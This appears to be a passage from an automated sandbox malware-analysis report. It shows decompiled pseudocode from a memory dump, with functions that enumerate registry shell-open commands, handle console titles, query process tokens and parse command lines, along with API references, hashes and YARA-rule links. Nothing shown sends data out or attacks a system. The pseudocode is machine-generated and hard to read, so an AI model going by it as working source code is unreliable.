						E00340040(_t119);
						_t42 = 0x7b;
						goto L55;
					}
					E0033C5A2(__ecx, 0x400023a5, 1, __edx);
					_t42 = 0x7b;
					goto L55;
				}
				_t120 = 0;
				_v540 = 0x104;
				_v536 = 0;
				_t64 = RegEnumKeyExW(__ecx, 0,  &_v528,  &_v540, 0, 0, 0, 0);
				if(_t64 != 0) {
					L32:
					_t28 = _t64 - 0x103; // -259
					asm("sbb esi, esi");
					_t120 =  ~_t28 & _t64;
					goto L54;
				}
				do {
					if(_v528 == 0x2e) {
						L30:
						if( *0x35d544 != 0) {
							goto L34;
						}
						goto L31;
					}
					_t123 =  &_v528;
					_t9 = _t123 + 2; // 0x30
					_t102 = _t9;
					do {
						_t67 =  *_t123;
						_t123 = _t123 + 2;
					} while (_t67 != 0);
					_t125 = _t123 - _t102 >> 1;
					_t10 = _t125 + 0x14; // 0x40
					if(_t10 > 0x104) {
						L29:
						_t120 = _v536;
						goto L30;
					}
					_t116 = 0x104;
					_t69 =  &_v528;
					while( *_t69 != 0) {
						_t69 = _t69 + 2;
						_t116 = _t116 - 1;
						if(_t116 != 0) {
							continue;
						}
						break;
					}
					asm("sbb ecx, ecx");
					_t105 =  ~_t116 & 0x00000104 - _t116;
					if(_t116 == 0) {
						L22:
						_t113 =  &_v528;
						_t106 = _t81;
						_t72 = E00355662(_t81, _t81,  &_v528, _t119, _t125, 0);
						_t120 = _t125 + _t125;
						_t119 = _t72;
						if(_t120 >= 0x208) {
							E0034711D(_t72, _t81, _t106,  &_v528, _t119, _t120);
							goto L34;
						}
						 *((short*)(_t126 + _t120 - 0x20c)) = 0;
						if(_t119 == 0) {
							L28:
							E00340040(_t119);
							goto L29;
						}
						_t108 = _t119;
						_t21 = _t108 + 2; // 0x2
						_t113 = _t21;
						do {
							_t76 =  *_t108;
							_t108 = _t108 + 2;
						} while (_t76 != 0);
						if(_t108 != _t113) {
							_push(_t119);
							_push( &_v528);
							E003425D9(L"%s=%s\r\n");
							_t127 = _t127 + 0xc;
						}
						goto L28;
					}
					_t80 =  &(( &_v528)[_t105]);
					_t118 = 0x104 - _t105;
					if(0x104 == 0) {
						L19:
						_t80 = _t80 - 2;
						L21:
						 *_t80 = 0;
						goto L22;
					}
					_t112 = 0x7ffffffe;
					_t83 = L"\\Shell\\Open\\Command" - _t80;
					while(_t112 != 0) {
						_t119 =  *(_t83 + _t80) & 0x0000ffff;
						if(_t119 == 0) {
							break;
						}
						 *_t80 = _t119;
						_t112 = _t112 - 1;
						_t80 =  &(_t80[1]);
						_t118 = _t118 - 1;
						if(_t118 != 0) {
							continue;
						}
						L18:
						_t81 = _v532;
						goto L19;
					}
					__eflags = _t118;
					if(__eflags != 0) {
						_t81 = _v532;
						goto L21;
					}
					goto L18;
					L31:
					_v540 = 0x104;
					_t120 = _t120 + 1;
					_v536 = _t120;
					_t64 = RegEnumKeyExW(_t81, _t120,  &_v528,  &_v540, 0, 0, 0, 0);
				} while (_t64 == 0);
				goto L32;
			}

0x00354cf0
0x00354cfb
0x00354d02
0x00354d06
0x00354d08
0x00354d12
0x00354ec8
0x00354ecc
0x00354ef6
0x00354ef8
0x00354efa
0x00354ebe
0x00354ebe
0x00355000
0x00355010
0x00355010
0x00354f03
0x00354f08
0x00354f0a
0x00354f0c
0x00354f0e
0x00354f0e
0x00354f11
0x00354f13
0x00354f13
0x00354f16
0x00354f16
0x00354f19
0x00354f1c
0x00354f1c
0x00354f23
0x00354f25
0x00354f26
0x00354f29
0x00354f2e
0x00354f5b
0x00354f65
0x00354f70
0x00354f91
0x00354f93
0x00354f95
0x00354fa9
0x00354faf
0x00354fb6
0x00354fb8
0x00354fba
0x00354fe0
0x00354fe8
0x00354fed
0x00354ff2
0x00354ff7
0x00354ff9
0x00354ffe
0x00354ffe
0x00000000
0x00354ffe
0x00354fbc
0x00354fbe
0x00354fbe
0x00354fc1
0x00354fc1
0x00354fc4
0x00354fc7
0x00354fc7
0x00354fcc
0x00354fcc
0x00354fce
0x00354fd0
0x00000000
0x00000000
0x00354fd2
0x00354fd3
0x00354fd9
0x00000000
0x00354fd9
0x00354f9f
0x00000000
0x00354fa4
0x00354f30
0x00354f32
0x00354f37
0x00354f41
0x00354f46
0x00000000
0x00354f46
0x00354ed6
0x00354ede
0x00000000
0x00354ede
0x00354d18
0x00354d1a
0x00354d2e
0x00354d3e
0x00354d46
0x00354ea8
0x00354ea8
0x00354eb0
0x00354eb2
0x00000000
0x00354eb2
0x00354d50
0x00354d58
0x00354e68
0x00354e6f
0x00000000
0x00000000
0x00000000
0x00354e6f
0x00354d5e
0x00354d64
0x00354d64
0x00354d67
0x00354d67
0x00354d6a
0x00354d6d
0x00354d74
0x00354d76
0x00354d7e
0x00354e62
0x00354e62
0x00000000
0x00354e62
0x00354d84
0x00354d89
0x00354d90
0x00354d96
0x00354d99
0x00354d9c
0x00000000
0x00000000
0x00000000
0x00354d9c
0x00354da9
0x00354dab
0x00354daf
0x00354e05
0x00354e05
0x00354e0b
0x00354e0d
0x00354e12
0x00354e14
0x00354e1c
0x00354eb9
0x00000000
0x00354eb9
0x00354e24
0x00354e2e
0x00354e5b
0x00354e5d
0x00000000
0x00354e5d
0x00354e30
0x00354e32
0x00354e32
0x00354e35
0x00354e35
0x00354e38
0x00354e3b
0x00354e44
0x00354e46
0x00354e4d
0x00354e53
0x00354e58
0x00354e58
0x00000000
0x00354e44
0x00354dbc
0x00354dbf
0x00354dc1
0x00354df5
0x00354df5
0x00354e00
0x00354e02
0x00000000
0x00354e02
0x00354dc8
0x00354dcd
0x00354dd0
0x00354dd4
0x00354ddb
0x00000000
0x00000000
0x00354ddd
0x00354de0
0x00354de1
0x00354de4
0x00354de7
0x00000000
0x00000000
0x00354def
0x00354def
0x00000000
0x00354def
0x00354deb
0x00354ded
0x00354dfa
0x00000000
0x00354dfa
0x00000000
0x00354e71
0x00354e7f
0x00354e90
0x00354e94
0x00354e9a
0x00354ea0
0x00000000

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00354D3E
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000001,0000002E,00000104,00000000,00000000,00000000,00000000,?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 00354E9A
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,\Shell\Open\Command,00000000), ref: 00354F8B

Strings

%s=%s, xrefs: 00354E4E, 00354FD4
\Shell\Open\Command, xrefs: 00354DC3, 00354F60
., xrefs: 00354D50

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Enum$Open
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 2886760741-1459555574
Opcode ID: 5914ec90fe821943eb0e368d14320f70f28dbaa8eb9c5ec6d4172af4ed5d0f48
Instruction ID: b256d6663fb28fc7b511ac316ae9b5763a231755a0934aee4b7b4380d3455955
Opcode Fuzzy Hash: 5914ec90fe821943eb0e368d14320f70f28dbaa8eb9c5ec6d4172af4ed5d0f48
Instruction Fuzzy Hash: D1816075A0021457DB3A9B24DC96FFB33B9EF84305F154168ED0A9B291EB74AEC8C790

Uniqueness

Uniqueness Score: -1.00%

Function 0033B2B0, Relevance: 10.7, APIs: 7, Instructions: 172
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0033B2B0(WCHAR* __ecx, signed int _a4) {
				signed int _v12;
				long _v536;
				wchar_t* _v540;
				wchar_t* _v544;
				wchar_t* _v548;
				signed int _v552;
				WCHAR* _v556;
				intOrPtr _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				long _t35;
				void* _t38;
				short _t47;
				wchar_t* _t48;
				intOrPtr _t49;
				intOrPtr* _t50;
				intOrPtr _t51;
				signed int _t54;
				WCHAR* _t55;
				signed int _t62;
				intOrPtr* _t63;
				WCHAR* _t70;
				intOrPtr _t77;
				wchar_t* _t79;
				WCHAR* _t80;
				wchar_t* _t81;
				signed int _t82;

				_t65 = __ecx;
				_t32 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _t32 ^ _t82;
				_t62 = _a4;
				_t76 =  &_v544;
				_v552 = _t62;
				_v548 = 0;
				_v540 = 0;
				_t35 = E0033B42E( &_v544);
				if(_t35 < 0) {
					SetLastError(RtlNtStatusToDosError(_t35));
					L23:
					if(_t62 == 0) {
						_t62 = 0;
						_t80 = 0;
						L12:
						if(_t80 != 0) {
							SetConsoleTitleW(_t80);
							 *0x35d59c = _t62;
						}
						L14:
						_t77 = 0;
						if(_v548 == 0) {
							L17:
							_t38 = _v540;
							if(_t38 != 0) {
								LocalFree(_t38);
							}
							if(_t77 != 0) {
								L29:
								_push(0);
								_push(8);
								E0033C5A2(_t65);
								goto L20;
							} else {
								L20:
								return E00346FD0(_t77, _t62, _v12 ^ _t82, _t76, _t77, _t80);
							}
						}
						L15:
						if(_t80 != 0) {
							_t65 = _t80;
							E00340040(_t80);
						}
						goto L17;
					}
					_t65 =  *(_t62 + 0x3c);
					_t80 = E0033DEF9( *(_t62 + 0x3c));
					if(_t80 == 0) {
						goto L14;
					}
					_t70 = _t80;
					_t62 = 0;
					_t21 =  &(_t70[1]); // 0x2
					_t76 = _t21;
					do {
						_t47 =  *_t70;
						_t70 =  &(_t70[1]);
					} while (_t47 != 0);
					_t65 = _t70 - _t76 >> 1;
					if(_t70 - _t76 >> 1 < 0x104) {
						goto L12;
					}
					_t77 = 1;
					goto L29;
				}
				_t48 = _v544;
				if(_t48 >= 3) {
					_t48 = _t48 + 0xfffffff0;
				}
				if(_t48 != 0) {
					goto L23;
				} else {
					_t49 = _t48 + 1;
					_t77 = _t49;
					_v548 = _t49;
					_v560 = _t77;
					_t50 = E0033B3FC(_t65);
					_v540 = _t50;
					_t65 = 0x40002748;
					if(_t50 == 0) {
						goto L29;
					} else {
						_t63 = _t50;
						_t76 = 0;
						_t11 = _t63 + 2; // 0x2
						_t65 = _t11;
						do {
							_t51 =  *_t63;
							_t63 = _t63 + 2;
						} while (_t51 != 0);
						_t62 = _t63 - _t65 >> 1;
						if(_t62 >= 0x104) {
							goto L17;
						}
						_t65 = 0x208;
						_t80 = E003400B0(0x208);
						_v556 = _t80;
						if(_t80 == 0) {
							goto L17;
						}
						_t76 = 0x104;
						_t65 = _t80;
						E00341040(_t80, 0x104, _v540);
						_t54 = _v552;
						if(_t54 == 0) {
							_t55 =  &_v536;
							_v544 = _t55;
							if(GetConsoleTitleW(_t55, 0x104) == 0) {
								goto L15;
							}
							if(wcsstr( &_v536, _v540) == 0) {
								L36:
								_t76 = 0x104;
								_t65 = _t80;
								if(E003418C0(_t80, 0x104, _v544) != 0) {
									goto L15;
								}
								L11:
								_t62 = 0;
								goto L12;
							}
							_t79 = _v540;
							_t81 =  &_v536;
							_t62 = _t62 + _t62;
							do {
								_t81 = _t81 + _t62;
							} while (wcsstr(_t81, _t79) != 0);
							_t77 = _v560;
							_v544 = _t81;
							_t80 = _v556;
							goto L36;
						}
						if( *((intOrPtr*)(_t54 + 0x3c)) == 0) {
							_t65 = 0;
							_t77 = 0;
							goto L15;
						}
						_t76 = 0x104;
						_t65 = _t80;
						if(E003418C0(_t80, 0x104,  *((intOrPtr*)(_t54 + 0x3c))) != 0) {
							goto L15;
						}
						goto L11;
					}
				}
			}

0x0033b2b0
0x0033b2bb
0x0033b2c2
0x0033b2c6
0x0033b2c9
0x0033b2d2
0x0033b2d9
0x0033b2df
0x0033b2e5
0x0033b2ec
0x00351346
0x0035134c
0x0035134e
0x0035142c
0x0035142e
0x0033b3a0
0x0033b3a2
0x0033b3a5
0x0033b3ab
0x0033b3ab
0x0033b3b1
0x0033b3b3
0x0033b3bb
0x0033b3c8
0x0033b3c8
0x0033b3d0
0x0033b3d3
0x0033b3d3
0x0033b3db
0x0035138b
0x0035138d
0x0035138e
0x00351390
0x00000000
0x0033b3e1
0x0033b3e1
0x0033b3f3
0x0033b3f3
0x0033b3db
0x0033b3bd
0x0033b3bf
0x0033b3c1
0x0033b3c3
0x0033b3c3
0x00000000
0x0033b3bf
0x00351354
0x0035135c
0x00351360
0x00000000
0x00000000
0x00351366
0x00351368
0x0035136a
0x0035136a
0x0035136d
0x0035136d
0x00351370
0x00351373
0x0035137a
0x00351382
0x00000000
0x00000000
0x0035138a
0x00000000
0x0035138a
0x0033b2f2
0x0033b2fb
0x0035139c
0x0035139c
0x0033b303
0x00000000
0x0033b309
0x0033b309
0x0033b30a
0x0033b30c
0x0033b317
0x0033b31d
0x0033b322
0x0033b328
0x0033b32b
0x00000000
0x0033b331
0x0033b331
0x0033b333
0x0033b335
0x0033b335
0x0033b338
0x0033b338
0x0033b33b
0x0033b33e
0x0033b345
0x0033b34d
0x00000000
0x00000000
0x0033b34f
0x0033b359
0x0033b35b
0x0033b363
0x00000000
0x00000000
0x0033b36b
0x0033b370
0x0033b372
0x0033b377
0x0033b37f
0x003513a4
0x003513b0
0x003513be
0x00000000
0x00000000
0x003513db
0x0035140d
0x00351413
0x00351418
0x00351421
0x00000000
0x00000000
0x0033b39e
0x0033b39e
0x00000000
0x0033b39e
0x003513dd
0x003513e3
0x003513e9
0x003513eb
0x003513eb
0x003513f7
0x003513fb
0x00351401
0x00351407
0x00000000
0x00351407
0x0033b389
0x0033b3f6
0x0033b3f8
0x00000000
0x0033b3f8
0x0033b38e
0x0033b393
0x0033b39c
0x00000000
0x00000000
0x00000000
0x0033b39c
0x0033b32b

APIs

Part of subcall function 0033B42E: NtOpenThreadToken.NTDLL(000000FE,00000008,00000000,00000000), ref: 0033B448
Part of subcall function 0033B42E: NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 0033B460
Part of subcall function 0033B42E: NtClose.NTDLL(00000000), ref: 0033B4B1

SetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(00000000), ref: 0033B3A5
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?), ref: 0033B3D3
RtlNtStatusToDosError.NTDLL ref: 0035133F
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00351346
GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,?), ref: 003513B6
wcsstr.MSVCRT ref: 003513D1
wcsstr.MSVCRT ref: 003513EF

Part of subcall function 0033B3FC: FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,00000000,?,?,?,?,003595EF,00349564,00000001,?), ref: 0033B421

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: ConsoleErrorOpenTitleTokenwcsstr$CloseFormatFreeLastLocalMessageProcessStatusThread
String ID:
API String ID: 1313749407-0
Opcode ID: e2109a219110673962b0af4b8ad0866c076fc22fd9e062b2daa625e5715b394b
Instruction ID: 7099b0e0d2fa67f93bbf52c94e71660431206b6b9326773fb23a3d13cee8c396
Opcode Fuzzy Hash: e2109a219110673962b0af4b8ad0866c076fc22fd9e062b2daa625e5715b394b
Instruction Fuzzy Hash: 9651EA39A002299BDF229F759CD87AEB3B4EF54320F1501A9DE09DB250EB30DD85CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0033E9A0, Relevance: 10.6, APIs: 7, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0033E9A0(long __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t62;
				signed int _t63;
				long _t64;
				wchar_t* _t66;
				signed char _t67;
				signed int _t68;
				int _t70;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				long _t75;
				void* _t78;
				long _t83;
				void* _t86;
				void* _t92;
				signed int* _t95;
				int _t97;
				long _t99;
				wchar_t* _t101;
				wchar_t* _t104;
				wchar_t* _t106;
				wchar_t* _t109;
				long _t111;
				wchar_t* _t114;
				signed int _t117;
				void* _t118;
				signed short* _t123;
				long _t124;
				long _t125;
				signed int _t138;
				void* _t139;
				long _t142;
				signed int _t146;
				void* _t149;
				signed int _t152;
				long _t153;
				void* _t157;
				signed int _t159;
				signed int* _t160;
				signed int _t163;
				void* _t164;
				void* _t168;
				void* _t171;
				signed short* _t173;
				long _t174;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t183;
				signed int _t184;
				void* _t188;

				_t173 = __ecx;
				_t121 = 0x50;
				_push(_t160);
				_t114 = E003400B0(0x50);
				if(_t114 == 0) {
					E00359287(0x50);
					__imp__longjmp(0x36b8b8, 1);
					goto L91;
				} else {
					 *_t114 = __ecx;
					_t114[0x10] = 0;
					_t121 =  *0x36fa8c +  *0x36fa8c;
					_t111 = E003400B0( *0x36fa8c +  *0x36fa8c);
					if(_t111 == 0) {
						L91:
						E00359287(_t121);
						__imp__longjmp(0x36b8b8, 1);
						asm("int3");
						E00359287(_t121);
						__imp__longjmp(0x36b8b8, 1);
						E00359287(_t121);
						__imp__longjmp(0x36b8b8, 1);
						L94:
						while(1) {
							if(E0033D7D4(_t114,  *_t173) != 0) {
								L17:
								 *(_t184 - 0xdc) = 0;
								if(_t114 == 0) {
									L19:
									 *_t160 =  *_t173;
									_t160 =  &(_t160[0]);
									if( *_t173 == 0x22) {
										while(1) {
											_t62 = _t173[1];
											_t123 = _t173;
											_t173 =  &(_t173[1]);
											 *_t160 = _t62;
											_t160 =  &(_t160[0]);
											_t63 =  *_t173 & 0x0000ffff;
											if(_t63 == 0) {
												break;
											}
											if(_t63 == 0x22) {
												goto L20;
											} else {
												if(_t173[1] != 0) {
													continue;
												} else {
													goto L20;
												}
											}
											goto L22;
										}
										_t173 = _t123;
									}
									L20:
									 *(_t184 - 0xd8) = 0;
								} else {
									_t66 = wcschr(_t114,  *_t173 & 0x0000ffff);
									_t188 = _t188 + 8;
									if(_t66 != 0) {
										_t67 =  *(_t184 + 8);
										if((_t67 & 0x00000002) != 0) {
											_t68 =  *_t173 & 0x0000ffff;
											if( *(_t184 - 0xd8) == 0) {
												_t160 =  &(_t160[0]);
											}
											 *_t160 = _t68;
											 *(_t184 - 0xd8) = 1;
											_t160 =  &(_t160[1]);
										} else {
											if((_t67 & 0x00000004) != 0) {
												 *_t160 =  *_t173;
											}
											 *(_t184 - 0xd8) = 0;
											_t160 =  &(_t160[0]);
										}
									} else {
										goto L19;
									}
								}
								_t64 = _t173[1] & 0x0000ffff;
								_t173 =  &(_t173[1]);
								_t124 = _t64;
								if(_t64 != 0) {
									goto L14;
								}
							} else {
								L29:
								_t75 =  *_t173 & 0x0000ffff;
								if(_t75 != 0) {
									_t142 = _t75;
									while(_t142 != 0x22) {
										_t97 = iswspace(_t142);
										_t188 = _t188 + 4;
										if(_t97 != 0) {
											L39:
											if( *(_t184 - 0xe0) == 0 || _t114 == 0) {
												L42:
												if( *(_t184 - 0xe4) != 0) {
													if(E0033D7D4(_t114,  *_t173) != 0) {
														break;
													} else {
														goto L43;
													}
												} else {
													L43:
													_t99 = _t173[1] & 0x0000ffff;
													_t173 =  &(_t173[1]);
													_t142 = _t99;
													if(_t99 != 0) {
														continue;
													} else {
													}
												}
											} else {
												_t101 = wcschr(_t114,  *_t173 & 0x0000ffff);
												_t188 = _t188 + 8;
												if(_t101 != 0) {
													break;
												} else {
													goto L42;
												}
											}
										} else {
											_t104 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
											if(_t104 != 0) {
												goto L39;
											} else {
												break;
											}
										}
										goto L22;
									}
									if( *_t173 != 0) {
										if( *(_t184 - 0xdc) == 0 &&  *(_t184 - 0xd8) == 0) {
											_t160 =  &(_t160[0]);
										}
										 *(_t184 - 0xd8) = 1;
										goto L17;
										do {
											do {
												do {
													do {
														goto L17;
														L14:
													} while (_t124 == 0x22);
													_t70 = iswspace(_t124);
													_t188 = _t188 + 4;
													if(_t70 != 0) {
														break;
													} else {
														goto L16;
													}
													goto L22;
													L16:
													_t109 = wcschr(_t184 - 0xd4,  *_t173 & 0x0000ffff);
													_t188 = _t188 + 8;
												} while (_t109 == 0);
												_t71 =  *(_t184 + 8);
												if((_t71 & 0x00000001) != 0) {
													goto L54;
												} else {
													L25:
													_t72 = _t71 & 0x00000002;
													 *(_t184 - 0xe0) = _t72;
													if(_t72 == 0 || _t114 == 0) {
														goto L28;
													} else {
														goto L27;
													}
												}
												goto L22;
												L54:
											} while ( *(_t184 - 0xdc) == 0);
											goto L25;
											L27:
											_t106 = wcschr(_t114,  *_t173 & 0x0000ffff);
											_t188 = _t188 + 8;
										} while (_t106 != 0);
										L28:
										_t74 =  *(_t184 + 8) & 0x00000004;
										 *(_t184 - 0xe4) = _t74;
										if(_t74 != 0) {
											continue;
										} else {
											goto L29;
										}
									}
								}
							}
							L22:
							_t125 =  *(_t184 - 0xe8);
							_t163 = _t160 - _t125 >> 1;
							_t148 = 4 + _t163 * 2;
							if(E00340100(_t125, 4 + _t163 * 2) == 0) {
								E00359287(_t125);
								__imp__longjmp(0x36b8b8, 1);
								asm("int3");
								while(1) {
									L100:
									_t149 = _t125 + 2;
									do {
										_t78 =  *_t125;
										_t125 = _t125 + 2;
									} while (_t78 != 0);
									_t164 = _t163 + (_t125 - _t149 >> 1);
									while(1) {
										L64:
										_t128 = _t164 + _t164;
										_t174 = E003400B0(_t164 + _t164);
										 *(_t184 - 4) = _t174;
										if(_t174 == 0) {
											break;
										}
										_t130 = _t114[0xf];
										if(_t114[0xf] != 0) {
											E00341040(_t174, _t164, _t130);
										}
										_t86 = 0;
										if(_t164 == 0 || _t164 > 0x7fffffff) {
											_t86 = 0x80070057;
										}
										if(_t86 < 0) {
											L107:
											_t152 = 0;
										} else {
											_t86 = 0;
											_t139 = _t164;
											_t153 = _t174;
											if(_t164 == 0) {
												L106:
												_t86 = 0x80070057;
												goto L107;
											} else {
												while( *_t153 != _t86) {
													_t153 = _t153 + 2;
													_t139 = _t139 - 1;
													if(_t139 != 0) {
														continue;
													} else {
														goto L106;
													}
													goto L73;
												}
												if(_t139 == 0) {
													goto L106;
												} else {
													_t152 = _t164 - _t139;
												}
											}
										}
										L73:
										if(_t86 >= 0) {
											_t95 =  *(_t184 - 4) + _t152 * 2;
											_t179 = _t164 - _t152;
											if(_t179 == 0) {
												L79:
												_t95 = _t95 - 2;
											} else {
												_t157 = _t152 + 0x7ffffffe + _t179 - _t164;
												_t164 = 0x36faa0 - _t95;
												while(_t157 != 0) {
													_t138 =  *(_t164 + _t95) & 0x0000ffff;
													if(_t138 == 0) {
														break;
													} else {
														 *_t95 = _t138;
														_t157 = _t157 - 1;
														_t95 =  &(_t95[0]);
														_t179 = _t179 - 1;
														if(_t179 != 0) {
															continue;
														} else {
															goto L79;
														}
													}
													goto L81;
												}
												if(_t179 == 0) {
													goto L79;
												}
											}
											L81:
											_t174 =  *(_t184 - 4);
											 *_t95 = 0;
										}
										_t114[0xf] = _t174;
										while(E0033EEC8() != 0) {
											if(E0033F030(1) == 0x4000) {
												_t125 = _t114[0xf];
												_t163 =  *0x36fa8c;
												if(_t125 != 0) {
													goto L100;
												}
												goto L64;
											} else {
												_t177 =  *(_t184 - 8);
												if(E003402B0(_t114, _t177, _t164, _t177) != 0) {
													_t92 =  *_t177;
													do {
														_t51 = _t92 + 0x14; // 0x14
														_t117 = _t51;
														_t92 =  *_t117;
														 *(_t184 - 8) = _t117;
													} while (_t92 != 0);
													_t114 =  *(_t184 - 0x10);
													continue;
												} else {
													E0033F300(_t91, 0, 0, _t91);
													break;
												}
											}
											goto L112;
										}
										_t114[0xd] =  *(_t184 - 0xc);
										return _t114;
										goto L112;
									}
									E00359287(_t128);
									__imp__longjmp(0x36b8b8, 1);
									asm("int3");
									if( *0x36fa90 != 0) {
										E003582EB(_t128);
									}
									 *0x35d5c8 = 0;
									if( *0x36fa88 != 0) {
										E00358121(_t174, 0);
									}
									_t83 = _t174;
									return _t83;
									goto L112;
								}
							} else {
								_pop(_t168);
								_pop(_t180);
								_pop(_t118);
								return E00346FD0(_t76, _t118,  *(_t184 - 8) ^ _t184, _t148, _t168, _t180);
							}
							goto L112;
						}
					} else {
						_t159 =  *0x36fa8c;
						_t114[0xe] = _t111;
						if(_t159 != 0) {
							if(_t159 > 0x7fffffff) {
								if(_t159 != 0) {
									goto L10;
								}
							} else {
								_t183 = 0x7ffffffe - _t159;
								_t171 = 0x36faa0 - _t111;
								while(_t183 + _t159 != 0) {
									_t146 =  *(_t171 + _t111) & 0x0000ffff;
									if(_t146 == 0) {
										break;
									} else {
										 *_t111 = _t146;
										_t111 = _t111 + 2;
										_t159 = _t159 - 1;
										if(_t159 != 0) {
											continue;
										} else {
											L8:
											_t111 = _t111 - 2;
										}
									}
									L10:
									 *_t111 = 0;
									goto L11;
								}
								if(_t159 == 0) {
									goto L8;
								}
								goto L10;
							}
						}
						L11:
						return _t114;
					}
				}
				L112:
			}

0x0033e9a4
0x0033e9a6
0x0033e9ab
0x0033e9b1
0x0033e9b5
0x0034c018
0x0034c024
0x00000000
0x0033e9bb
0x0033e9c0
0x0033e9c2
0x0033e9c9
0x0033e9cc
0x0033e9d3
0x0034c02a
0x0034c02a
0x0034c036
0x0034c03c
0x0034c03d
0x0034c049
0x0034c04f
0x0034c05b
0x00000000
0x0034c061
0x0034c06d
0x0033eb5a
0x0033eb5a
0x0033eb66
0x0033eb7e
0x0033eb81
0x0033eb84
0x0033eb8b
0x0033ecf0
0x0033ecf0
0x0033ecf4
0x0033ecf6
0x0033ecf9
0x0033ecfc
0x0033ecff
0x0033ed05
0x00000000
0x00000000
0x0033ed0a
0x00000000
0x0033ed10
0x0033ed15
0x00000000
0x0033ed17
0x00000000
0x0033ed17
0x0033ed15
0x00000000
0x0033ed0a
0x0033ed6e
0x0033ed6e
0x0033eb91
0x0033eb91
0x0033eb68
0x0033eb6d
0x0033eb73
0x0033eb78
0x0033eccd
0x0033ecd2
0x0033ed23
0x0033ed26
0x0033ed69
0x0033ed69
0x0033ed28
0x0033ed2e
0x0033ed38
0x0033ecd4
0x0033ecd6
0x0034c092
0x0034c092
0x0033ecdc
0x0033ece6
0x0033ece6
0x00000000
0x00000000
0x00000000
0x0033eb78
0x0033eb9b
0x0033eb9f
0x0033eba2
0x0033eba7
0x00000000
0x00000000
0x0034c073
0x0033ec20
0x0033ec20
0x0033ec26
0x0033ec28
0x0033ec30
0x0033ec37
0x0033ec3d
0x0033ec42
0x0033ec8a
0x0033ec91
0x0033eca9
0x0033ecb0
0x0034c084
0x00000000
0x0034c08a
0x00000000
0x0034c08a
0x0033ecb6
0x0033ecb6
0x0033ecb6
0x0033ecba
0x0033ecbd
0x0033ecc2
0x00000000
0x00000000
0x0033ecc8
0x0033ecc2
0x0033ec97
0x0033ec9c
0x0033eca2
0x0033eca7
0x00000000
0x00000000
0x00000000
0x00000000
0x0033eca7
0x0033ec44
0x0033ec4f
0x0033ec55
0x0033ec5a
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ec5a
0x00000000
0x0033ec42
0x0033ec60
0x0033ec6d
0x0033ec78
0x0033ec78
0x0033ec7b
0x0033ec85
0x0033eb5a
0x0033eb5a
0x0033eb5a
0x0033eb5a
0x00000000
0x0033eb26
0x0033eb26
0x0033eb2d
0x0033eb33
0x0033eb38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0033eb3e
0x0033eb49
0x0033eb4f
0x0033eb52
0x0033ebde
0x0033ebe3
0x00000000
0x0033ebe9
0x0033ebe9
0x0033ebe9
0x0033ebec
0x0033ebf2
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ebf2
0x00000000
0x0033ed40
0x0033ed40
0x00000000
0x0033ebf8
0x0033ebfd
0x0033ec03
0x0033ec06
0x0033ec0e
0x0033ec11
0x0033ec14
0x0033ec1a
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ec1a
0x0033ec60
0x0033ec26
0x0033ebad
0x0033ebad
0x0033ebb5
0x0033ebb7
0x0033ebc5
0x0034c09a
0x0034c0a6
0x0034c0ac
0x0034c0ad
0x0034c0ad
0x0034c0ad
0x0034c0b0
0x0034c0b0
0x0034c0b3
0x0034c0b6
0x0034c0bf
0x0033edfa
0x0033edfa
0x0033edfa
0x0033ee02
0x0033ee04
0x0033ee09
0x00000000
0x00000000
0x0033ee0f
0x0033ee14
0x0034c0cb
0x0034c0cb
0x0033ee1a
0x0033ee1e
0x0034c0d5
0x0034c0d5
0x0033ee32
0x0034c0f0
0x0034c0f0
0x0033ee38
0x0033ee38
0x0033ee3a
0x0033ee3c
0x0033ee40
0x0034c0eb
0x0034c0eb
0x00000000
0x0033ee46
0x0033ee46
0x0034c0df
0x0034c0e2
0x0034c0e5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0034c0e5
0x0033ee51
0x00000000
0x0033ee57
0x0033ee59
0x0033ee59
0x0033ee51
0x0033ee40
0x0033ee5b
0x0033ee5d
0x0033ee64
0x0033ee67
0x0033ee69
0x0033ee99
0x0033ee99
0x0033ee6b
0x0033ee7a
0x0033ee7c
0x0033ee80
0x0033ee84
0x0033ee8b
0x00000000
0x0033ee8d
0x0033ee8d
0x0033ee90
0x0033ee91
0x0033ee94
0x0033ee97
0x00000000
0x00000000
0x00000000
0x00000000
0x0033ee97
0x00000000
0x0033ee8b
0x0033eea0
0x00000000
